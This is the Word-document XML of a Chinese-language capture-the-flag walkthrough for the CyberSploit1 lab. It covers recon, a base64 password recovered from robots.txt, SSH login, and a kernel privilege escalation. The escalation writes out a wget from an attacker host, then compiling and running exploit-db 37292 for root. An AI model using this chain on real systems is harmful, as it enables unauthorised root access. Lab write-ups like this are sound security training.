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3040" cy="3950335"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="6" name="圖片 6" descr="CyberSploit1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CyberSploit1#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有開</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>22,80 port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4100195" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="5" name="圖片 5" descr="CyberSploit1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CyberSploit1#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查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>page source，最下方發現username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>itsskv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3558540" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="4" name="圖片 4" descr="CyberSploit1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yberSploit1#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>dirsearch -u 192.168.157.92</w:t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發現robots.txt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4496435" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="3" name="圖片 3" descr="CyberSploit1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CyberSploit1#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查看robots.txt發現一段hash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770" cy="557530"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="2" name="圖片 2" descr="CyberSploit1#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CyberSploit1#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>echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 -d;</w:t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經過</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>hash-identifier得知是bash64 encode，破譯後得出密碼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2633345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1" name="圖片 1" descr="CyberSploit1#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yberSploit1#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 xml:space="preserve">ssh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>itsskv@192.168.157.92</w:t>
      </w:r>
    </w:p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ssh登入後取得local.txt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770" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="9" name="圖片 9" descr="CyberSploit1#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CyberSploit1#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慣例linpeas，發現漏洞3.13.0-32-generic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64785" cy="744220"/>
            <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
            <wp:docPr id="8" name="圖片 8" descr="CyberSploit1#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CyberSploit1#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color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://www.exploit-db.com/exploits/37292</w:t>
      </w:r>
    </w:p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exploitdb有描述漏洞使用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135" cy="3256280"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="7" name="圖片 7" descr="CyberSploit1#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CyberSploit1#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 xml:space="preserve">wget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>http://192.168.45.242/37292.c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>gcc 37292.c -o exploit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t>./exploit</w:t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成功取得roo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia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A4F02"/>
    <w:rsid w:val="1B6C6CC3"/>
    <w:rsid w:val="2718617C"/>
    <w:rsid w:val="29B663F2"/>
    <w:rsid w:val="32E00053"/>
    <w:rsid w:val="34D555B2"/>
    <w:rsid w:val="36C416EF"/>
    <w:rsid w:val="379011AE"/>
    <w:rsid w:val="3CF10205"/>
    <w:rsid w:val="449421C4"/>
    <w:rsid w:val="50F33182"/>
    <w:rsid w:val="654B6241"/>
    <w:rsid w:val="6E910863"/>
    <w:rsid w:val="738200A1"/>
    <w:rsid w:val="7C337B35"/>
    <w:rsid w:val="7D037F5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2024-06-13T02:19:45Z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